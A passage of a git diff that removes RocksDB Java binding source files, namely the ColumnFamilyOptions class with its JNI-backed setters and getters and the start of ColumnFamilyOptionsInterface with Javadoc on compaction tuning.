- * ColumnFamilyOptions to control the behavior of a database.  It will be used
- * during the creation of a {@link org.rocksdb.RocksDB} (i.e., RocksDB.open()).
- *
- * If {@link #dispose()} function is not called, then it will be GC'd
- * automatically and native resources will be released as part of the process.
- */
-public class ColumnFamilyOptions extends RocksObject
-    implements ColumnFamilyOptionsInterface<ColumnFamilyOptions>,
-    MutableColumnFamilyOptionsInterface<ColumnFamilyOptions> {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct ColumnFamilyOptions.
-   *
-   * This constructor will create (by allocating a block of memory)
-   * an {@code rocksdb::DBOptions} in the c++ side.
-   */
-  public ColumnFamilyOptions() {
-    super(newColumnFamilyOptions());
-  }
-
-  /**
-   * <p>Method to get a options instance by using pre-configured
-   * property values. If one or many values are undefined in
-   * the context of RocksDB the method will return a null
-   * value.</p>
-   *
-   * <p><strong>Note</strong>: Property keys can be derived from
-   * getter methods within the options class. Example: the method
-   * {@code writeBufferSize()} has a property key:
-   * {@code write_buffer_size}.</p>
-   *
-   * @param properties {@link java.util.Properties} instance.
-   *
-   * @return {@link org.rocksdb.ColumnFamilyOptions instance}
-   *     or null.
-   *
-   * @throws java.lang.IllegalArgumentException if null or empty
-   *     {@link Properties} instance is passed to the method call.
-   */
-  public static ColumnFamilyOptions getColumnFamilyOptionsFromProps(
-      final Properties properties) {
-    if (properties == null || properties.size() == 0) {
-      throw new IllegalArgumentException(
-          "Properties value must contain at least one value.");
-    }
-    ColumnFamilyOptions columnFamilyOptions = null;
-    StringBuilder stringBuilder = new StringBuilder();
-    for (final String name : properties.stringPropertyNames()){
-      stringBuilder.append(name);
-      stringBuilder.append("=");
-      stringBuilder.append(properties.getProperty(name));
-      stringBuilder.append(";");
-    }
-    long handle = getColumnFamilyOptionsFromProps(
-        stringBuilder.toString());
-    if (handle != 0){
-      columnFamilyOptions = new ColumnFamilyOptions(handle);
-    }
-    return columnFamilyOptions;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeForSmallDb() {
-    optimizeForSmallDb(nativeHandle_);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeForPointLookup(
-      final long blockCacheSizeMb) {
-    optimizeForPointLookup(nativeHandle_,
-        blockCacheSizeMb);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeLevelStyleCompaction() {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeLevelStyleCompaction(
-      final long memtableMemoryBudget) {
-    optimizeLevelStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeUniversalStyleCompaction() {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        DEFAULT_COMPACTION_MEMTABLE_MEMORY_BUDGET);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions optimizeUniversalStyleCompaction(
-      final long memtableMemoryBudget) {
-    optimizeUniversalStyleCompaction(nativeHandle_,
-        memtableMemoryBudget);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setComparator(
-      final BuiltinComparator builtinComparator) {
-    assert(isOwningHandle());
-    setComparatorHandle(nativeHandle_, builtinComparator.ordinal());
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setComparator(
-      final AbstractComparator<? extends AbstractSlice<?>> comparator) {
-    assert (isOwningHandle());
-    setComparatorHandle(nativeHandle_, comparator.getNativeHandle());
-    comparator_ = comparator;
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setMergeOperatorName(final String name) {
-    assert (isOwningHandle());
-    if (name == null) {
-      throw new IllegalArgumentException(
-          "Merge operator name must not be null.");
-    }
-    setMergeOperatorName(nativeHandle_, name);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setMergeOperator(
-      final MergeOperator mergeOperator) {
-    setMergeOperator(nativeHandle_, mergeOperator.nativeHandle_);
-    return this;
-  }
-
-  public ColumnFamilyOptions setCompactionFilter(
-        final AbstractCompactionFilter<? extends AbstractSlice<?>>
-            compactionFilter) {
-    setCompactionFilterHandle(nativeHandle_, compactionFilter.nativeHandle_);
-    compactionFilter_ = compactionFilter;
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setWriteBufferSize(final long writeBufferSize) {
-    assert(isOwningHandle());
-    setWriteBufferSize(nativeHandle_, writeBufferSize);
-    return this;
-  }
-
-  @Override
-  public long writeBufferSize()  {
-    assert(isOwningHandle());
-    return writeBufferSize(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxWriteBufferNumber(
-      final int maxWriteBufferNumber) {
-    assert(isOwningHandle());
-    setMaxWriteBufferNumber(nativeHandle_, maxWriteBufferNumber);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumber() {
-    assert(isOwningHandle());
-    return maxWriteBufferNumber(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMinWriteBufferNumberToMerge(
-      final int minWriteBufferNumberToMerge) {
-    setMinWriteBufferNumberToMerge(nativeHandle_, minWriteBufferNumberToMerge);
-    return this;
-  }
-
-  @Override
-  public int minWriteBufferNumberToMerge() {
-    return minWriteBufferNumberToMerge(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions useFixedLengthPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useFixedLengthPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions useCappedPrefixExtractor(final int n) {
-    assert(isOwningHandle());
-    useCappedPrefixExtractor(nativeHandle_, n);
-    return this;
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompressionType(
-      final CompressionType compressionType) {
-    setCompressionType(nativeHandle_, compressionType.getValue());
-    return this;
-  }
-
-  @Override
-  public CompressionType compressionType() {
-    return CompressionType.getCompressionType(compressionType(nativeHandle_));
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompressionPerLevel(
-      final List<CompressionType> compressionLevels) {
-    final byte[] byteCompressionTypes = new byte[
-        compressionLevels.size()];
-    for (int i = 0; i < compressionLevels.size(); i++) {
-      byteCompressionTypes[i] = compressionLevels.get(i).getValue();
-    }
-    setCompressionPerLevel(nativeHandle_, byteCompressionTypes);
-    return this;
-  }
-
-  @Override
-  public List<CompressionType> compressionPerLevel() {
-    final byte[] byteCompressionTypes =
-        compressionPerLevel(nativeHandle_);
-    final List<CompressionType> compressionLevels = new ArrayList<>();
-    for (final Byte byteCompressionType : byteCompressionTypes) {
-      compressionLevels.add(CompressionType.getCompressionType(
-          byteCompressionType));
-    }
-    return compressionLevels;
-  }
-
-  @Override
-  public ColumnFamilyOptions setBottommostCompressionType(
-      final CompressionType bottommostCompressionType) {
-    setBottommostCompressionType(nativeHandle_,
-        bottommostCompressionType.getValue());
-    return this;
-  }
-
-  @Override
-  public CompressionType bottommostCompressionType() {
-    return CompressionType.getCompressionType(
-        bottommostCompressionType(nativeHandle_));
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompressionOptions(
-      final CompressionOptions compressionOptions) {
-    setCompressionOptions(nativeHandle_, compressionOptions.nativeHandle_);
-    this.compressionOptions_ = compressionOptions;
-    return this;
-  }
-
-  @Override
-  public CompressionOptions compressionOptions() {
-    return this.compressionOptions_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setNumLevels(final int numLevels) {
-    setNumLevels(nativeHandle_, numLevels);
-    return this;
-  }
-
-  @Override
-  public int numLevels() {
-    return numLevels(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelZeroFileNumCompactionTrigger(
-      final int numFiles) {
-    setLevelZeroFileNumCompactionTrigger(
-        nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroFileNumCompactionTrigger() {
-    return levelZeroFileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelZeroSlowdownWritesTrigger(
-      final int numFiles) {
-    setLevelZeroSlowdownWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroSlowdownWritesTrigger() {
-    return levelZeroSlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelZeroStopWritesTrigger(final int numFiles) {
-    setLevelZeroStopWritesTrigger(nativeHandle_, numFiles);
-    return this;
-  }
-
-  @Override
-  public int levelZeroStopWritesTrigger() {
-    return levelZeroStopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setTargetFileSizeBase(
-      final long targetFileSizeBase) {
-    setTargetFileSizeBase(nativeHandle_, targetFileSizeBase);
-    return this;
-  }
-
-  @Override
-  public long targetFileSizeBase() {
-    return targetFileSizeBase(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setTargetFileSizeMultiplier(
-      final int multiplier) {
-    setTargetFileSizeMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public int targetFileSizeMultiplier() {
-    return targetFileSizeMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxBytesForLevelBase(
-      final long maxBytesForLevelBase) {
-    setMaxBytesForLevelBase(nativeHandle_, maxBytesForLevelBase);
-    return this;
-  }
-
-  @Override
-  public long maxBytesForLevelBase() {
-    return maxBytesForLevelBase(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevelCompactionDynamicLevelBytes(
-      final boolean enableLevelCompactionDynamicLevelBytes) {
-    setLevelCompactionDynamicLevelBytes(nativeHandle_,
-        enableLevelCompactionDynamicLevelBytes);
-    return this;
-  }
-
-  @Override
-  public boolean levelCompactionDynamicLevelBytes() {
-    return levelCompactionDynamicLevelBytes(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxBytesForLevelMultiplier(final double multiplier) {
-    setMaxBytesForLevelMultiplier(nativeHandle_, multiplier);
-    return this;
-  }
-
-  @Override
-  public double maxBytesForLevelMultiplier() {
-    return maxBytesForLevelMultiplier(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxCompactionBytes(final long maxCompactionBytes) {
-    setMaxCompactionBytes(nativeHandle_, maxCompactionBytes);
-    return this;
-  }
-
-  @Override
-  public long maxCompactionBytes() {
-    return maxCompactionBytes(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setArenaBlockSize(
-      final long arenaBlockSize) {
-    setArenaBlockSize(nativeHandle_, arenaBlockSize);
-    return this;
-  }
-
-  @Override
-  public long arenaBlockSize() {
-    return arenaBlockSize(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setDisableAutoCompactions(
-      final boolean disableAutoCompactions) {
-    setDisableAutoCompactions(nativeHandle_, disableAutoCompactions);
-    return this;
-  }
-
-  @Override
-  public boolean disableAutoCompactions() {
-    return disableAutoCompactions(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionStyle(
-      final CompactionStyle compactionStyle) {
-    setCompactionStyle(nativeHandle_, compactionStyle.getValue());
-    return this;
-  }
-
-  @Override
-  public CompactionStyle compactionStyle() {
-    return CompactionStyle.values()[compactionStyle(nativeHandle_)];
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxTableFilesSizeFIFO(
-      final long maxTableFilesSize) {
-    assert(maxTableFilesSize > 0); // unsigned native type
-    assert(isOwningHandle());
-    setMaxTableFilesSizeFIFO(nativeHandle_, maxTableFilesSize);
-    return this;
-  }
-
-  @Override
-  public long maxTableFilesSizeFIFO() {
-    return maxTableFilesSizeFIFO(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxSequentialSkipInIterations(
-      final long maxSequentialSkipInIterations) {
-    setMaxSequentialSkipInIterations(nativeHandle_,
-        maxSequentialSkipInIterations);
-    return this;
-  }
-
-  @Override
-  public long maxSequentialSkipInIterations() {
-    return maxSequentialSkipInIterations(nativeHandle_);
-  }
-
-  @Override
-  public MemTableConfig memTableConfig() {
-    return this.memTableConfig_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setMemTableConfig(
-      final MemTableConfig memTableConfig) {
-    setMemTableFactory(
-        nativeHandle_, memTableConfig.newMemTableFactoryHandle());
-    this.memTableConfig_ = memTableConfig;
-    return this;
-  }
-
-  @Override
-  public String memTableFactoryName() {
-    assert(isOwningHandle());
-    return memTableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public TableFormatConfig tableFormatConfig() {
-    return this.tableFormatConfig_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setTableFormatConfig(
-      final TableFormatConfig tableFormatConfig) {
-    setTableFactory(nativeHandle_, tableFormatConfig.newTableFactoryHandle());
-    this.tableFormatConfig_ = tableFormatConfig;
-    return this;
-  }
-
-  @Override
-  public String tableFactoryName() {
-    assert(isOwningHandle());
-    return tableFactoryName(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setInplaceUpdateSupport(
-      final boolean inplaceUpdateSupport) {
-    setInplaceUpdateSupport(nativeHandle_, inplaceUpdateSupport);
-    return this;
-  }
-
-  @Override
-  public boolean inplaceUpdateSupport() {
-    return inplaceUpdateSupport(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setInplaceUpdateNumLocks(
-      final long inplaceUpdateNumLocks) {
-    setInplaceUpdateNumLocks(nativeHandle_, inplaceUpdateNumLocks);
-    return this;
-  }
-
-  @Override
-  public long inplaceUpdateNumLocks() {
-    return inplaceUpdateNumLocks(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMemtablePrefixBloomSizeRatio(
-      final double memtablePrefixBloomSizeRatio) {
-    setMemtablePrefixBloomSizeRatio(nativeHandle_, memtablePrefixBloomSizeRatio);
-    return this;
-  }
-
-  @Override
-  public double memtablePrefixBloomSizeRatio() {
-    return memtablePrefixBloomSizeRatio(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setBloomLocality(int bloomLocality) {
-    setBloomLocality(nativeHandle_, bloomLocality);
-    return this;
-  }
-
-  @Override
-  public int bloomLocality() {
-    return bloomLocality(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxSuccessiveMerges(
-      final long maxSuccessiveMerges) {
-    setMaxSuccessiveMerges(nativeHandle_, maxSuccessiveMerges);
-    return this;
-  }
-
-  @Override
-  public long maxSuccessiveMerges() {
-    return maxSuccessiveMerges(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setOptimizeFiltersForHits(
-      final boolean optimizeFiltersForHits) {
-    setOptimizeFiltersForHits(nativeHandle_, optimizeFiltersForHits);
-    return this;
-  }
-
-  @Override
-  public boolean optimizeFiltersForHits() {
-    return optimizeFiltersForHits(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions
-  setMemtableHugePageSize(
-      long memtableHugePageSize) {
-    setMemtableHugePageSize(nativeHandle_,
-        memtableHugePageSize);
-    return this;
-  }
-
-  @Override
-  public long memtableHugePageSize() {
-    return memtableHugePageSize(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setSoftPendingCompactionBytesLimit(long softPendingCompactionBytesLimit) {
-    setSoftPendingCompactionBytesLimit(nativeHandle_,
-        softPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long softPendingCompactionBytesLimit() {
-    return softPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setHardPendingCompactionBytesLimit(long hardPendingCompactionBytesLimit) {
-    setHardPendingCompactionBytesLimit(nativeHandle_, hardPendingCompactionBytesLimit);
-    return this;
-  }
-
-  @Override
-  public long hardPendingCompactionBytesLimit() {
-    return hardPendingCompactionBytesLimit(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevel0FileNumCompactionTrigger(int level0FileNumCompactionTrigger) {
-    setLevel0FileNumCompactionTrigger(nativeHandle_, level0FileNumCompactionTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0FileNumCompactionTrigger() {
-    return level0FileNumCompactionTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevel0SlowdownWritesTrigger(int level0SlowdownWritesTrigger) {
-    setLevel0SlowdownWritesTrigger(nativeHandle_, level0SlowdownWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0SlowdownWritesTrigger() {
-    return level0SlowdownWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setLevel0StopWritesTrigger(int level0StopWritesTrigger) {
-    setLevel0StopWritesTrigger(nativeHandle_, level0StopWritesTrigger);
-    return this;
-  }
-
-  @Override
-  public int level0StopWritesTrigger() {
-    return level0StopWritesTrigger(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxBytesForLevelMultiplierAdditional(int[] maxBytesForLevelMultiplierAdditional) {
-    setMaxBytesForLevelMultiplierAdditional(nativeHandle_, maxBytesForLevelMultiplierAdditional);
-    return this;
-  }
-
-  @Override
-  public int[] maxBytesForLevelMultiplierAdditional() {
-    return maxBytesForLevelMultiplierAdditional(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setParanoidFileChecks(boolean paranoidFileChecks) {
-    setParanoidFileChecks(nativeHandle_, paranoidFileChecks);
-    return this;
-  }
-
-  @Override
-  public boolean paranoidFileChecks() {
-    return paranoidFileChecks(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setMaxWriteBufferNumberToMaintain(
-      final int maxWriteBufferNumberToMaintain) {
-    setMaxWriteBufferNumberToMaintain(
-        nativeHandle_, maxWriteBufferNumberToMaintain);
-    return this;
-  }
-
-  @Override
-  public int maxWriteBufferNumberToMaintain() {
-    return maxWriteBufferNumberToMaintain(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionPriority(
-      final CompactionPriority compactionPriority) {
-    setCompactionPriority(nativeHandle_, compactionPriority.getValue());
-    return this;
-  }
-
-  @Override
-  public CompactionPriority compactionPriority() {
-    return CompactionPriority.getCompactionPriority(
-        compactionPriority(nativeHandle_));
-  }
-
-  @Override
-  public ColumnFamilyOptions setReportBgIoStats(final boolean reportBgIoStats) {
-    setReportBgIoStats(nativeHandle_, reportBgIoStats);
-    return this;
-  }
-
-  @Override
-  public boolean reportBgIoStats() {
-    return reportBgIoStats(nativeHandle_);
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionOptionsUniversal(
-      final CompactionOptionsUniversal compactionOptionsUniversal) {
-    setCompactionOptionsUniversal(nativeHandle_,
-        compactionOptionsUniversal.nativeHandle_);
-    this.compactionOptionsUniversal_ = compactionOptionsUniversal;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsUniversal compactionOptionsUniversal() {
-    return this.compactionOptionsUniversal_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setCompactionOptionsFIFO(final CompactionOptionsFIFO compactionOptionsFIFO) {
-    setCompactionOptionsFIFO(nativeHandle_,
-        compactionOptionsFIFO.nativeHandle_);
-    this.compactionOptionsFIFO_ = compactionOptionsFIFO;
-    return this;
-  }
-
-  @Override
-  public CompactionOptionsFIFO compactionOptionsFIFO() {
-    return this.compactionOptionsFIFO_;
-  }
-
-  @Override
-  public ColumnFamilyOptions setForceConsistencyChecks(final boolean forceConsistencyChecks) {
-    setForceConsistencyChecks(nativeHandle_, forceConsistencyChecks);
-    return this;
-  }
-
-  @Override
-  public boolean forceConsistencyChecks() {
-    return forceConsistencyChecks(nativeHandle_);
-  }
-
-  /**
-   * <p>Private constructor to be used by
-   * {@link #getColumnFamilyOptionsFromProps(java.util.Properties)}</p>
-   *
-   * @param handle native handle to ColumnFamilyOptions instance.
-   */
-  private ColumnFamilyOptions(final long handle) {
-    super(handle);
-  }
-
-  private static native long getColumnFamilyOptionsFromProps(
-      String optString);
-
-  private static native long newColumnFamilyOptions();
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void optimizeForSmallDb(final long handle);
-  private native void optimizeForPointLookup(long handle,
-      long blockCacheSizeMb);
-  private native void optimizeLevelStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void optimizeUniversalStyleCompaction(long handle,
-      long memtableMemoryBudget);
-  private native void setComparatorHandle(long handle, int builtinComparator);
-  private native void setComparatorHandle(long optHandle,
-      long comparatorHandle);
-  private native void setMergeOperatorName(long handle, String name);
-  private native void setMergeOperator(long handle, long mergeOperatorHandle);
-  private native void setCompactionFilterHandle(long handle,
-      long compactionFilterHandle);
-  private native void setWriteBufferSize(long handle, long writeBufferSize)
-      throws IllegalArgumentException;
-  private native long writeBufferSize(long handle);
-  private native void setMaxWriteBufferNumber(
-      long handle, int maxWriteBufferNumber);
-  private native int maxWriteBufferNumber(long handle);
-  private native void setMinWriteBufferNumberToMerge(
-      long handle, int minWriteBufferNumberToMerge);
-  private native int minWriteBufferNumberToMerge(long handle);
-  private native void setCompressionType(long handle, byte compressionType);
-  private native byte compressionType(long handle);
-  private native void setCompressionPerLevel(long handle,
-      byte[] compressionLevels);
-  private native byte[] compressionPerLevel(long handle);
-  private native void setBottommostCompressionType(long handle,
-      byte bottommostCompressionType);
-  private native byte bottommostCompressionType(long handle);
-  private native void setCompressionOptions(long handle,
-      long compressionOptionsHandle);
-  private native void useFixedLengthPrefixExtractor(
-      long handle, int prefixLength);
-  private native void useCappedPrefixExtractor(
-      long handle, int prefixLength);
-  private native void setNumLevels(
-      long handle, int numLevels);
-  private native int numLevels(long handle);
-  private native void setLevelZeroFileNumCompactionTrigger(
-      long handle, int numFiles);
-  private native int levelZeroFileNumCompactionTrigger(long handle);
-  private native void setLevelZeroSlowdownWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroSlowdownWritesTrigger(long handle);
-  private native void setLevelZeroStopWritesTrigger(
-      long handle, int numFiles);
-  private native int levelZeroStopWritesTrigger(long handle);
-  private native void setTargetFileSizeBase(
-      long handle, long targetFileSizeBase);
-  private native long targetFileSizeBase(long handle);
-  private native void setTargetFileSizeMultiplier(
-      long handle, int multiplier);
-  private native int targetFileSizeMultiplier(long handle);
-  private native void setMaxBytesForLevelBase(
-      long handle, long maxBytesForLevelBase);
-  private native long maxBytesForLevelBase(long handle);
-  private native void setLevelCompactionDynamicLevelBytes(
-      long handle, boolean enableLevelCompactionDynamicLevelBytes);
-  private native boolean levelCompactionDynamicLevelBytes(
-      long handle);
-  private native void setMaxBytesForLevelMultiplier(long handle, double multiplier);
-  private native double maxBytesForLevelMultiplier(long handle);
-  private native void setMaxCompactionBytes(long handle, long maxCompactionBytes);
-  private native long maxCompactionBytes(long handle);
-  private native void setArenaBlockSize(
-      long handle, long arenaBlockSize)
-      throws IllegalArgumentException;
-  private native long arenaBlockSize(long handle);
-  private native void setDisableAutoCompactions(
-      long handle, boolean disableAutoCompactions);
-  private native boolean disableAutoCompactions(long handle);
-  private native void setCompactionStyle(long handle, byte compactionStyle);
-  private native byte compactionStyle(long handle);
-   private native void setMaxTableFilesSizeFIFO(
-      long handle, long max_table_files_size);
-  private native long maxTableFilesSizeFIFO(long handle);
-  private native void setMaxSequentialSkipInIterations(
-      long handle, long maxSequentialSkipInIterations);
-  private native long maxSequentialSkipInIterations(long handle);
-  private native void setMemTableFactory(long handle, long factoryHandle);
-  private native String memTableFactoryName(long handle);
-  private native void setTableFactory(long handle, long factoryHandle);
-  private native String tableFactoryName(long handle);
-  private native void setInplaceUpdateSupport(
-      long handle, boolean inplaceUpdateSupport);
-  private native boolean inplaceUpdateSupport(long handle);
-  private native void setInplaceUpdateNumLocks(
-      long handle, long inplaceUpdateNumLocks)
-      throws IllegalArgumentException;
-  private native long inplaceUpdateNumLocks(long handle);
-  private native void setMemtablePrefixBloomSizeRatio(
-      long handle, double memtablePrefixBloomSizeRatio);
-  private native double memtablePrefixBloomSizeRatio(long handle);
-  private native void setBloomLocality(
-      long handle, int bloomLocality);
-  private native int bloomLocality(long handle);
-  private native void setMaxSuccessiveMerges(
-      long handle, long maxSuccessiveMerges)
-      throws IllegalArgumentException;
-  private native long maxSuccessiveMerges(long handle);
-  private native void setOptimizeFiltersForHits(long handle,
-      boolean optimizeFiltersForHits);
-  private native boolean optimizeFiltersForHits(long handle);
-  private native void setMemtableHugePageSize(long handle,
-      long memtableHugePageSize);
-  private native long memtableHugePageSize(long handle);
-  private native void setSoftPendingCompactionBytesLimit(long handle,
-      long softPendingCompactionBytesLimit);
-  private native long softPendingCompactionBytesLimit(long handle);
-  private native void setHardPendingCompactionBytesLimit(long handle,
-      long hardPendingCompactionBytesLimit);
-  private native long hardPendingCompactionBytesLimit(long handle);
-  private native void setLevel0FileNumCompactionTrigger(long handle,
-      int level0FileNumCompactionTrigger);
-  private native int level0FileNumCompactionTrigger(long handle);
-  private native void setLevel0SlowdownWritesTrigger(long handle,
-      int level0SlowdownWritesTrigger);
-  private native int level0SlowdownWritesTrigger(long handle);
-  private native void setLevel0StopWritesTrigger(long handle,
-      int level0StopWritesTrigger);
-  private native int level0StopWritesTrigger(long handle);
-  private native void setMaxBytesForLevelMultiplierAdditional(long handle,
-      int[] maxBytesForLevelMultiplierAdditional);
-  private native int[] maxBytesForLevelMultiplierAdditional(long handle);
-  private native void setParanoidFileChecks(long handle,
-      boolean paranoidFileChecks);
-  private native boolean paranoidFileChecks(long handle);
-  private native void setMaxWriteBufferNumberToMaintain(final long handle,
-      final int maxWriteBufferNumberToMaintain);
-  private native int maxWriteBufferNumberToMaintain(final long handle);
-  private native void setCompactionPriority(final long handle,
-      final byte compactionPriority);
-  private native byte compactionPriority(final long handle);
-  private native void setReportBgIoStats(final long handle,
-    final boolean reportBgIoStats);
-  private native boolean reportBgIoStats(final long handle);
-  private native void setCompactionOptionsUniversal(final long handle,
-    final long compactionOptionsUniversalHandle);
-  private native void setCompactionOptionsFIFO(final long handle,
-    final long compactionOptionsFIFOHandle);
-  private native void setForceConsistencyChecks(final long handle,
-    final boolean forceConsistencyChecks);
-  private native boolean forceConsistencyChecks(final long handle);
-
-  // instance variables
-  private MemTableConfig memTableConfig_;
-  private TableFormatConfig tableFormatConfig_;
-  private AbstractComparator<? extends AbstractSlice<?>> comparator_;
-  private AbstractCompactionFilter<? extends AbstractSlice<?>> compactionFilter_;
-  private CompactionOptionsUniversal compactionOptionsUniversal_;
-  private CompactionOptionsFIFO compactionOptionsFIFO_;
-  private CompressionOptions compressionOptions_;
-
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java
deleted file mode 100644
index 5cb68b4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptionsInterface.java
+++ /dev/null
@@ -1,375 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public interface ColumnFamilyOptionsInterface
-    <T extends ColumnFamilyOptionsInterface>
-        extends AdvancedColumnFamilyOptionsInterface<T> {
-
-  /**
-   * Use this if your DB is very small (like under 1GB) and you don't want to
-   * spend lots of memory for memtables.
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeForSmallDb();
-
-  /**
-   * Use this if you don't need to keep the data sorted, i.e. you'll never use
-   * an iterator, only Put() and Get() API calls
-   *
-   * @param blockCacheSizeMb Block cache size in MB
-   * @return the instance of the current object.
-   */
-  T optimizeForPointLookup(long blockCacheSizeMb);
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for level style compaction.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeLevelStyleCompaction();
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for level style compaction.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @param memtableMemoryBudget memory budget in bytes
-   * @return the instance of the current object.
-   */
-  T optimizeLevelStyleCompaction(
-      long memtableMemoryBudget);
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for universal style compaction.</p>
-   *
-   * <p>Universal style compaction is focused on reducing Write Amplification
-   * Factor for big data sets, but increases Space Amplification.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   *
-   * <p>Note: we might use more memory than memtable_memory_budget during high
-   * write rate period</p>
-   *
-   * @return the instance of the current object.
-   */
-  T optimizeUniversalStyleCompaction();
-
-  /**
-   * <p>Default values for some parameters in ColumnFamilyOptions are not
-   * optimized for heavy workloads and big datasets, which means you might
-   * observe write stalls under some conditions. As a starting point for tuning
-   * RocksDB options, use the following for universal style compaction.</p>
-   *
-   * <p>Universal style compaction is focused on reducing Write Amplification
-   * Factor for big data sets, but increases Space Amplification.</p>
-   *
-   * <p>Make sure to also call IncreaseParallelism(), which will provide the
-   * biggest performance gains.</p>
-   *
